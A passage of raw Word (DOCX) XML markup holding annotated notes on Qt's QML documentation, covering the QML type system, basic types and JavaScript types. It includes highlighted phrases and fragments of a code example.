          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Clockwise</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> }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 xml:space="preserve">    }</w:t>
      </w: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bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D6639" w:rsidRPr="00D815C8" w:rsidRDefault="005D6639" w:rsidP="005D6639">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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD0039" w:rsidRPr="00D815C8" w:rsidRDefault="005D6639" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For further details on the JavaScript engine used by QML, as well as the difference from browser JS, see the full documentation on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId106" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>JavaScript Expressions in QML Documents</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="003D0D8B" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId107" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="003D0D8B">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-typesystem-topic.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="003D0D8B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc483000567"/>
      <w:bookmarkStart w:id="163" w:name="_Toc483003588"/>
      <w:bookmarkStart w:id="164" w:name="_Toc483603919"/>
      <w:bookmarkStart w:id="165" w:name="_Toc483605139"/>
      <w:r w:rsidRPr="00E7621B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The QML Type System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
      <w:bookmarkEnd w:id="163"/>
      <w:bookmarkEnd w:id="164"/>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which may be used in the definition of an object hierarchy in a QML document can come from various sources. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>They may be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">provided </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0D8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>natively by the QML language</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>registered via C++</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by QML modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">provided as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003D0D8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>by QML modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="24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Furthermore, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>application developers can provide their own types</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, either by </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>registering C++ types directly</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or by </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>defining reusable components in QML documents</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which can then be imported.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="003D0D8B" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Wherever the type definitions come from, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the engine will enforce type-safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for properties and instances of those types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="003D0D8B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="basic-types"/>
      <w:bookmarkStart w:id="167" w:name="_Toc483000568"/>
      <w:bookmarkStart w:id="168" w:name="_Toc483003589"/>
      <w:bookmarkStart w:id="169" w:name="_Toc483603920"/>
      <w:bookmarkStart w:id="170" w:name="_Toc483605140"/>
      <w:bookmarkEnd w:id="166"/>
      <w:r w:rsidRPr="00E7621B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Basic Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
      <w:bookmarkEnd w:id="168"/>
      <w:bookmarkEnd w:id="169"/>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The QML language has </w:t>
      </w:r>
      <w:r w:rsidRPr="0064767B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>built-in support for various primitive types</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> including </w:t>
      </w:r>
      <w:r w:rsidRPr="0064767B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>integers, double-precision floating point numbers, strings, and boolean values</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Objects may have properties of these types, and values of these types may be passed as arguments to methods of objects.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>he</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> types can be safely used in objects.</w:t>
      </w:r>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See the</w:t>
      </w:r>
      <w:r w:rsidR="008931E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId108" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QML Basic Types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008931E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>documentation for more information about basic types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00FD0330">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="javascript-types"/>
      <w:bookmarkStart w:id="172" w:name="_Toc483000569"/>
      <w:bookmarkStart w:id="173" w:name="_Toc483003590"/>
      <w:bookmarkStart w:id="174" w:name="_Toc483603921"/>
      <w:bookmarkStart w:id="175" w:name="_Toc483605141"/>
      <w:bookmarkEnd w:id="171"/>
      <w:r w:rsidRPr="00E7621B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
      <w:bookmarkEnd w:id="173"/>
      <w:bookmarkEnd w:id="174"/>
      <w:bookmarkEnd w:id="175"/>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JavaScript objects and arrays are supported by the QML engine. </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Any standard JavaScript type can be created and stored</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the generic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>var</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type.</w:t>
      </w:r>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For example, the standard</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highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</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highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Array</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>types are available, as below:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w: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QtQuick</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2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
